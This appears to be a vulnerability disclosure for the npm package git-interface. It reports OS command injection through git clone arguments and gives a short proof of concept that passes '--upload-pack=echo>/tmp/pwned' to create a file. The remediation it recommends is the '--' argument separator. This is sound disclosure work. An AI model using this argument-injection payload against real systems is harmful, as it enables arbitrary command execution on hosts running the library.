git-interface
describes itself as a Interface to work with a git repository in node.js
Resources:
I’m reporting an OS Command Injection vulnerability in git-interface
npm package. The API may be abused if user input is able to provide a valid directory on disk and supply the destination directory to clone a repository too.
Install [email protected]
which is the latest.
Run the following code, with the following precondition, in which the /tmp/new
directory needs to exist (doesn’t need to be a .git initialized directory though), and so, you could provide a predictable path like say /usr/src
:
const { Git } = require('git-interface');
const git = new Git({
dir: '/tmp/new' //default path is current directory
});
git.clone('file:///tmp/new', '--upload-pack=echo>/tmp/pwned');
Observe a new file created: /tmp/pwned
Use the shell --
notation as a suffix of the supported command-line arguments (if at all), to then make sure that input passed to the git command is positional arguments rather than command-line arguments. For example: git clone -- <path> <destination>
would prevent path and destination from being interpreted as command-line arguments for the git command.
Liran Tal